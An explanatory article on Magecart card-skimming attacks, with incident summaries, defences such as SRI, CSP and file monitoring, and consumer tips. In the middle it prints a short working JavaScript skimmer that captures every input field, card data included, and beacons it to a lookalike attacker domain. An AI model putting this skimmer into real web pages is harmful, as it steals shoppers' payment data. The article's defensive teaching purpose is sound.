When you enter your credit card details on a shopping website, you assume that information goes directly to the payment processor. Magecart attacks prove that assumption wrong. Since at least 2016, criminal groups operating under the loose “Magecart” label have infected thousands of e-commerce websites with malicious JavaScript that silently copies payment card data the moment a user types it — before the form is even submitted.
What Is a Magecart Attack?
Magecart is not a single group but a collection of cybercriminal groups — at least a dozen distinct threat actors — all using the same core technique: digital card skimming. They inject malicious JavaScript into e-commerce checkout pages. When a shopper fills in their name, card number, expiration date, and CVV, the skimmer captures every keystroke and transmits the data to an attacker-controlled server.
The name comes from Magento, the popular e-commerce platform that was the original primary target. Today, attacks target WooCommerce, Shopify (through third-party scripts), BigCommerce, and custom-built checkout systems.
How the Attacks Work
Direct compromise: Attackers exploit vulnerabilities in the e-commerce platform itself (unpatched Magento, outdated plugins) to gain server access and inject malicious code into checkout pages. The script often disguises itself as a Google Analytics tracker or Stripe payment helper.
Supply chain attack: More sophisticated Magecart groups don’t attack the store directly — they compromise the third-party JavaScript libraries the store loads. A retailer might use a chat widget, analytics service, or A/B testing tool that loads an external JavaScript file. If attackers compromise that third-party provider’s CDN or code repository, every site that loads their script becomes a victim simultaneously.
The 2018 British Airways breach, which exposed around 500,000 customers' payment data, sits between these two categories. The attackers got into BA's network using compromised remote-access credentials belonging to a third-party contractor, then edited BA's own copy of the Modernizr library, which the booking page (and the mobile app, which loaded the same web resources) pulled from BA's infrastructure rather than from an external CDN. Because the modified file came from an origin the site legitimately trusted, SRI on third-party URLs and a CSP allowlist would not have caught it; integrity monitoring of the served files might have.
The skimmer payload:
A simplified version of what a Magecart skimmer looks like:
// Disguised as legitimate analytics; a real sample would be obfuscated.
(function() {
  var _0x = function() {
    // Hook every input on the page, which on a checkout form includes the
    // card number, expiry date and CVV fields.
    document.querySelectorAll('input').forEach(function(el) {
      // 'input' fires on every keystroke, so the data leaves the page even
      // if the shopper never presses "Pay".
      el.addEventListener('input', function() {
        var data = {
          field: el.name,
          value: el.value,
          url: window.location.href
        };
        // Exfiltrate to attacker server. sendBeacon is fire-and-forget and
        // survives page navigation; the hostname imitates Google Analytics.
        navigator.sendBeacon('https://google-analytics.pw/collect',
          JSON.stringify(data));
      });
    });
  };
  window.addEventListener('load', _0x);
})();
Real skimmers are heavily obfuscated, often appearing as strings of hex or base64-encoded characters to evade detection.
Notable Magecart Incidents
British Airways (2018): 500,000 customer records. Attacker modified 22 lines of JavaScript on the booking page. GDPR fine: £20 million.
Ticketmaster (2018): 40,000 customers affected. Compromised Inbenta Technologies’ customer support chat script that Ticketmaster embedded.
Newegg (2018): About five weeks of skimming activity, from mid-August to mid-September. Attackers registered the lookalike domain neweggstats.com to receive stolen data.
Macy’s (2019): Malicious script on the Macy’s checkout and wallet page collected card information for one week.
Claire’s (2020): Skimmer active for about six weeks, from late April to mid-June. Intersport was hit in the same period by the same campaign, indicating coordinated targeting.
These are only the disclosed incidents. Security researchers estimate thousands of smaller e-commerce sites are actively skimmed at any given time, with victims often unaware for months.
Detection and Defense for Website Operators
Subresource Integrity (SRI): For any third-party JavaScript you load, add an integrity attribute with a cryptographic hash of the expected file:
<script src="https://cdn.example.com/analytics.js"
integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/ux..."
crossorigin="anonymous">
</script>
If the file the CDN serves differs from the one you hashed, the browser refuses to execute it. Two caveats: SRI only works for scripts whose content you control or pin to a fixed version, so a vendor script that is updated in place cannot carry an integrity attribute; and the attribute covers only that file, not anything the script itself loads later.
Content Security Policy (CSP): A strict CSP header limits where scripts may load from (script-src) and where the page may send data: connect-src governs fetch, XHR and sendBeacon, img-src covers tracking-pixel style exfiltration, and form-action covers a checkout form whose action has been pointed at the attacker. Directives you omit fall back to default-src, except form-action, which must be set explicitly. Sent as one header line, the policy below reads:
Content-Security-Policy: default-src 'self';
script-src 'self' https://trusted-cdn.com;
connect-src 'self' https://api.stripe.com;
form-action 'self'
CSP cannot help when the attacker edits a script on an origin you allow, as in the British Airways case, and it is only as strict as its weakest source expression: a bare https: in script-src or connect-src permits any host on the internet. Add a reporting endpoint (report-to, or the older report-uri) so that blocked requests become detection signals rather than silent failures.
Regular file integrity monitoring: Tools like AIDE or Tripwire (Linux) or commercial equivalents compare file hashes against a stored baseline and alert when JavaScript files on your server change unexpectedly. Watch templates and theme files as well as the scripts themselves, and on Magento also the configuration rows where head snippets and "miscellaneous HTML" are stored, because skimmers are frequently injected into the database rather than into files on disk.
Third-party script auditing: Regularly audit every external JavaScript resource your checkout page loads. Question whether each one is necessary, and favor self-hosting critical scripts over CDN loading.
Protecting Yourself as a Consumer
You cannot detect a Magecart skimmer as a shopper — the checkout page looks identical to a clean one. But you can limit your exposure:
Use virtual card numbers. Services like Privacy.com (US), Revolut (EU/UK), and many major banks’ virtual card features generate one-time or merchant-locked card numbers. A one-time number captured by a skimmer is useless after the transaction it was created for; a merchant-locked number can only be charged by that merchant, so it cannot be resold or used elsewhere.
Pay via PayPal, Apple Pay, or Google Pay. These payment methods don’t expose your real card number to the merchant’s JavaScript at all. The number stays in a tokenized system.
Monitor your statements. Magecart theft is often tested with small transactions ($1–$5) before a larger fraud attempt. Alert on any unfamiliar transaction.
Use separate cards for online shopping. If your designated online shopping card is skimmed, only that card is compromised — not your primary debit or credit card.
Prefer checkout-page isolation. Sites that hand the card entry to the payment processor, either by redirecting you to a hosted page (Stripe Checkout, PayPal) or by embedding the card fields in the processor’s own iframe (Braintree’s hosted fields), keep the card number out of reach of scripts running on the merchant’s page. They are safer than inline checkout forms, though not immune: skimmers have responded by drawing a fake card form over the real one, so be suspicious if you are asked for card details twice or the payment form looks different from the rest of the site.
The Bigger Picture
Magecart attacks highlight the fundamental security problem with the modern web: every third-party script a site loads is implicitly trusted to execute code in the user’s browser with the same privileges as the site itself. Until websites universally adopt strict CSPs, SRI, and thorough third-party audits, digital skimming remains one of the most profitable and difficult-to-detect forms of payment fraud.